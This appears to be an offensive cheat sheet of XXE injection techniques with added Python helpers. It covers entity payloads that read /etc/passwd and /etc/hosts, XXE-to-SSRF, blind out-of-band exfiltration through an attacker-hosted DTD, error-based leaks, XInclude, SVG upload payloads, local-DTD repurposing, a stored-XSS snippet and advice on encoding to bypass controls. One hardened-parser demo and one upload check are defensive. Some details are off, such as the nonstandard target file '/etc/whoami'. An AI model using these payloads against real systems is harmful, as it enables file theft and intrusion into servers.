[XXE INJECTION]
GENERAL INFORMATION
NOTES:
1. Always inspect requests and responses: if XML is present in a request body, there is a chance to attempt XXE.
2. Each time you find a file upload and the .xml extension (or any XML-based format) is allowed, XXE attempts are needed.
3. DTD means Document Type Definition: the block between <!DOCTYPE ... [ and ]> where entities are declared.
4. Think of an entity declared in the DTD as a "declared variable" that you can define and then invoke from the document.
5. One way to bypass problems with the returned content (newlines or special characters that break the XML, truncated output) is to have the target encode it in base64. Mostly used on blind attacks.
   SAMPLE: <!ENTITY % VAR_NAME SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
   (the php:// wrapper only works when the XML parser runs inside PHP)
6. If some tests are not providing results, attempt with an external DTD hosted on a server you control, so you can exfiltrate data and confirm a blind XXE.
NOTE: XSL = Extensible Stylesheet Language, the style sheet language of XML. An XSLT stylesheet is itself an XML document, so where a stylesheet is accepted it can be invoked in a similar way to the XML attacks below.
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> </xsl:stylesheet>

EXTERNAL ENTITIES
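Added example for this section (not code from the original notes): Python's standard-library SAX parser run over the CUMBIA sample that follows, once configured like a vulnerable application (external general entities resolved) and once with the hardened default that drops them. The target file is a constructed temporary file standing in for /etc/hosts so it runs offline; the file name, the helper names and the sample content are assumptions of this example.

```python
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


class TextCollector(ContentHandler):
    """Collects element text, i.e. what the application reads out of
    <Id>&CUMBIA;</Id> after the parser has expanded the entity."""

    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)


def xxe_payload(target_url, entity_name="CUMBIA"):
    """The EXTERNAL ENTITIES sample: DOCTYPE between the XML declaration
    and the root element, entity invoked as &NAME; inside one field."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        f'<!DOCTYPE attempt [ <!ENTITY {entity_name} SYSTEM "{target_url}"> ]>\n'
        f"<Check><Id>&{entity_name};</Id><productId>1</productId></Check>\n"
    ).encode("utf-8")


def parse_text(xml_bytes, resolve_external_entities):
    """Parse with the stdlib SAX parser and return the concatenated text.
    resolve_external_entities=True mirrors a vulnerable application;
    False is the stdlib default (since Python 3.7.1) and the hardened form:
    the parser then drops the entity instead of fetching the SYSTEM URI."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    handler = TextCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(handler.parts)


def demo():
    """Writes a constructed stand-in for /etc/hosts to a temp file (example
    data, not a real hosts file) and parses the payload both ways.
    Returns (leaked, blocked)."""
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as f:
        f.write("127.0.0.1 localhost\n")
        secret_path = f.name
    try:
        payload = xxe_payload("file://" + secret_path)
        leaked = parse_text(payload, resolve_external_entities=True)
        blocked = parse_text(payload, resolve_external_entities=False)
    finally:
        os.unlink(secret_path)
    return leaked, blocked


if __name__ == "__main__":
    leaked, blocked = demo()
    print("vulnerable parser returned:", repr(leaked))
    print("hardened parser returned:  ", repr(blocked))
```

With resolution enabled the <Id> field comes back holding the file content; with the default it holds nothing, which is why the same request either leaks or silently does nothing depending on the parser configuration. Swapping the file:// URL for an http:// one is the XXE-to-SSRF attempt from the CROSS ATTACKS section.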
1. Traffic inspection is needed [burpsuite].
SAMPLE (full request body):
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE attempt [ <!ENTITY CUMBIA SYSTEM "file:///etc/hosts"> ]>
<Check>
  <Id>&CUMBIA;</Id>
  <productId>1</productId>
</Check>
GET DATA (the DTD alone):
<!DOCTYPE attempt [ <!ENTITY VAR_NAME SYSTEM "file:///etc/hosts"> ]>
NOTE: to invoke the entity/variable you declared, specific characters are needed: &VAR_NAME; (ampersand, name, semicolon).
NOTE: "CUMBIA" is the entity/variable name used to pull /etc/hosts from the file system. It is declared in the DTD and invoked from one input field of the XML document, so that field is returned containing the file content.
!!!! The DOCTYPE block goes in a specific place: between the <?xml ...?> declaration and the root element. CHECK SAMPLE! Modify the name as you want.
XSS: an XML field is also a place to store markup. CDATA stops the parser from interpreting it, so if the value is later rendered in a browser it becomes stored XSS:
<![CDATA[<script>alert('stored XSS!')</script>]]>

CROSS ATTACKS
:::> XXE TO SSRF
One simple attempt: the same external entity payload and technique, pointing at a URL instead of a file. To confirm it you need a server you control (vuln_server) that logs the incoming request made by the target.
GET DATA:
<!DOCTYPE attempt [ <!ENTITY VAR_NAME SYSTEM "http://IP_ADDR/URI_PATH"> ]>
When a URL path is fetched, the application may print the response of that path (or the next path it was sent to) in the field where the entity is invoked. Try other paths to see whether they provide more information.

BLIND TECHNIQUES
:::> VIA ERROR MESSAGES
NOTES:
- If the app returns errors regarding XML parsing, that behaviour can be abused: the file content ends up inside the error message.
- It helps to exfil multi-line information.
- Two nested entities are required: one to define the file to exfil (file) and a second one (eval) that declares a third entity (exfil or error) whose SYSTEM URI contains the file content. Loading that third entity either sends the data out-of-band (exfil, http:// URL on your server) or fails with the data in the error (error, nonexistent file:// path).
- Out-of-band communication helps to discover the flaw. That is also why an external exploit server hosting the entities is usually needed: the internal subset of the request does not allow a parameter entity reference inside a declaration, an external DTD does.
ATTACK SAMPLE:
As it is a blind technique, an external exploit server hosts the entities. The flaw is triggered locally (by the request), but the external interaction is required.
::: >> EXPLOIT SERVER HOSTING ENTITIES
URL: https://URL/exploit
_.STEP ONE: EXPLOIT FILE | CUMBIA.html (served as plain text, HTTP/1.1 200 OK, Content-Type: text/plain; the body is ONLY the DTD, no <html> wrapper)
<!ENTITY % file SYSTEM "file:///etc/hosts">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///404FILE/%file;'>">
%eval;
%error;
NOTE: when declaring an entity inside another entity's value, the % of the inner declaration must be written as &#x25; so it is not consumed when eval is declared. %file; stays literal: it is expanded while eval is being declared, which is what places the file content in the inner SYSTEM URI.
ENTITY TO EXFIL (out-of-band, the data travels in the URL requested from your server):
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://URL/?x=%file;'>">
ENTITY TO GENERATE ERROR (the data appears in the parser error):
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///404FILE/%file;'>">
_.STEP TWO: INSERT DTD in the request
<!DOCTYPE attempt [ <!ENTITY % VAR_NAME SYSTEM "http://DTD-URL/CUMBIA.html"> %VAR_NAME; ]>
NOTE: very important to encode (base64, URL encode, etc.), one time, two times; it can bypass a lot of controls.

EXPLOIT XInclude
NOTES:
- XInclude is a W3C XML specification that allows an XML document to be built from sub-documents.
- When you do not control the entire XML document (the server wraps your value in its own XML) you cannot define the DOCTYPE element. That's when XInclude works!
- You can place an XInclude attack within any data value in an XML document, so any input field that ends up inside server-side XML can work.
- It needs two references: the XInclude namespace declaration (the structure) and the xi:include element pointing at the content to retrieve.
SAMPLE:
<NAME xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></NAME>
xmlns:xi binds the prefix xi to the XInclude namespace, so the parser knows that xi:include is an inclusion.
xi:include carries the attributes: href (what to fetch) and parse="text" (include it as text, so the file does not need to be well-formed XML).

XXE via FILE UPLOAD
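Added example for the file upload section (not code from the original notes): it builds the SVG payload, checks that the file is well-formed without fetching the target, and shows the server-side check an upload handler can apply. The entity name, the target path and the helper names are assumptions; a mismatch between the declared entity and the &name; reference (an easy typo when copying payloads) makes the whole image unparseable, which the check reports.

```python
import re
import xml.dom.minidom
from xml.parsers.expat import ExpatError


def svg_xxe(entity_name="attempt", target="file:///etc/hosts"):
    """SVG image whose <text> element is the expansion of an external
    entity: the file content is drawn into the image when a server-side
    renderer resolves entities. Entity name and target are example choices."""
    return (
        '<?xml version="1.0" standalone="yes"?>'
        f'<!DOCTYPE test [ <!ENTITY {entity_name} SYSTEM "{target}"> ]>'
        '<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" '
        'xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">'
        f'<text font-size="16" x="0" y="16">&{entity_name};</text></svg>'
    )


def well_formed(xml_text):
    """Syntax check only: minidom never fetches external entities, so this
    confirms DOCTYPE placement and that the reference matches a declared
    entity without touching the target file. Declaring 'attempt' but
    referencing &xxe; comes back False (undefined entity)."""
    try:
        xml.dom.minidom.parseString(xml_text)
        return True
    except ExpatError:
        return False


# Server-side check before rendering an uploaded SVG: a legitimate image
# never needs a DOCTYPE or entity declarations, so their presence is enough
# to reject the upload.
DTD_MARKERS = re.compile(rb"<!(DOCTYPE|ENTITY)\b", re.IGNORECASE)


def reject_svg_upload(data):
    """True when the uploaded bytes carry a DTD or entity declaration."""
    return DTD_MARKERS.search(data) is not None


if __name__ == "__main__":
    payload = svg_xxe()
    print(payload)
    print("well-formed:", well_formed(payload))
    print("rejected by upload check:", reject_svg_upload(payload.encode()))
```

Run the well-formedness check on every upload payload before sending it: a rendering backend that silently fails on a malformed SVG looks exactly like one that is not vulnerable.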
Note the possible options to upload files:
- What extensions are allowed?
- The same techniques used on LFI or RFI (extension and content tricks) can be applied.
- SVG is formatted as XML, so each time you find a place to upload images you can escalate from file upload to XXE.
- You can create an image file and, as it is XML, set a DTD in it so the rendered image contains the content of the file you point at.
PAYLOAD:
<?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY attempt SYSTEM "file:///etc/whoami" > ]><svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="16" x="0" y="16">&attempt;</text></svg>
NOTE: the reference (&attempt;) must match the declared entity name, otherwise the SVG is not well-formed and nothing is rendered. The file content is drawn as text inside the image.
It is added in the same way as RFI or LFI attacks.

XXE TO RETRIEVE DATA / REPURPOSING A LOCAL DTD
- To exploit this one you reuse an existing DTD that is stored on the server, as a benefit for the attack: the request loads the local DTD and redefines one of the parameter entities it references.
- So first you need to know what environment you are working on, to search for an existing well-known DTD to reference (and which parameter entity it uses).
Format of the DTD to use:
1. Declare the local DTD as an external parameter entity.
2. Redefine a parameter entity used by that DTD (ISOamso in the sample); its value holds the file/eval/error entities (check sample structure).
3. Inside it, declare the content to retrieve with a SYSTEM entity (file).
4. Declare the EVAL entity, whose value declares an ERROR entity pointing to a non-existent file to generate the error.
5. Invoke the entities: %eval; and %error; inside the redefinition, then %local_dtd; to load the DTD and trigger everything.
NOTE: everything inside the redefined entity value sits one level deeper, so every % is written as &#x25;, the & of the inner &#x25; becomes &#x26; and the inner ' becomes &#x27;; the internal subset does not accept a raw % inside a declaration.
SAMPLE PAYLOAD:
<!DOCTYPE message [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
<!ENTITY % ISOamso '
<!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
&#x25;eval;
&#x25;error;
'>
%local_dtd;
]>
NOTE: docbookx.dtd is a common DTD found on GNOME desktop systems (shipped with yelp). It is important to understand how the local DTD works (which parameter entities it references, here ISOamso) in order to use it, as it will be invoked.
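Added example (not code from the original notes) covering both the hosted external DTD of VIA ERROR MESSAGES and the local-DTD internal-subset payload of this section: it builds the file/eval/error entity trio, applies the one extra layer of character-reference encoding the internal subset needs, and checks the encoding by undoing one level the way a parser does when it stores an entity value. The target path, the sink URI, the DTD path and the name of the redefined parameter entity are parameters with assumed example values; the helper names are this example's own.

```python
import re


def external_dtd(target, sink, name="error"):
    """Declarations as hosted on the exploit server (CUMBIA.html served as
    text) or, equally, as the replacement text of a parameter entity.

    target: file the parser should read, e.g. file:///etc/passwd
    sink:   URI prefix the file content is appended to. A nonexistent
            file:// path makes the parser fail with the content in the
            error (name="error"); an http:// URL on a server you control
            sends it out-of-band (name="exfil").

    Only the '%' that starts the inner declaration is written as &#x25;,
    so it survives until %eval; is included. %file; stays literal: it is
    expanded while eval is declared, which puts the file content into the
    inner SYSTEM URI."""
    return (
        f'<!ENTITY % file SYSTEM "{target}">\n'
        f'<!ENTITY % eval "<!ENTITY &#x25; {name} SYSTEM \'{sink}%file;\'>">\n'
        "%eval;\n"
        f"%{name};\n"
    )


def request_with_external_dtd(dtd_url, pe_name="VAR_NAME"):
    """STEP TWO: the DOCTYPE placed in the request so the parser fetches
    and includes the hosted DTD."""
    return f'<!DOCTYPE attempt [ <!ENTITY % {pe_name} SYSTEM "{dtd_url}"> %{pe_name}; ]>'


def escape_entity_value(text, quote):
    """One level of nesting inside an entity literal delimited by `quote`:
    '&' and '%' become character references so they are stored rather than
    acted on when the outer entity is declared; the delimiter is encoded
    too so it cannot end the literal early."""
    out = text.replace("&", "&#x26;").replace("%", "&#x25;")
    return out.replace(quote, "&#x27;" if quote == "'" else "&#x22;")


def expand_char_refs(text):
    """What a parser does once when it stores an entity value: resolve the
    hexadecimal character references. Used here to verify the escaping
    round-trips back to the external DTD form."""
    return re.sub(r"&#x([0-9A-Fa-f]+);", lambda m: chr(int(m.group(1), 16)), text)


def local_dtd_payload(local_dtd, redefined_pe, target, sink, name="error"):
    """Internal subset that loads a DTD already on the server and redefines
    one parameter entity it references. The trio now sits inside a
    single-quoted entity value in the internal subset, where a raw '%' in a
    declaration is not allowed, so the whole external form is escaped once
    more: % -> &#x25;, the & of &#x25; -> &#x26;, ' -> &#x27;."""
    body = escape_entity_value(external_dtd(target, sink, name), "'")
    return (
        "<!DOCTYPE message [\n"
        f'<!ENTITY % local_dtd SYSTEM "{local_dtd}">\n'
        f"<!ENTITY % {redefined_pe} '\n{body}'>\n"
        "%local_dtd;\n"
        "]>\n"
    )


if __name__ == "__main__":
    print(external_dtd("file:///etc/hosts", "file:///404FILE/", "exfil"))
    print(request_with_external_dtd("http://DTD-URL/CUMBIA.html"))
    print(local_dtd_payload("file:///usr/share/yelp/dtd/docbookx.dtd", "ISOamso",
                            "file:///etc/passwd", "file:///nonexistent/"))
```

The round-trip check (expand one level of character references and compare with the external DTD text) is the quickest way to tell whether a hand-written internal-subset payload is encoded the right number of times; most failed local-DTD attempts are one &#x25; short or one too many.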
©® - Since 2023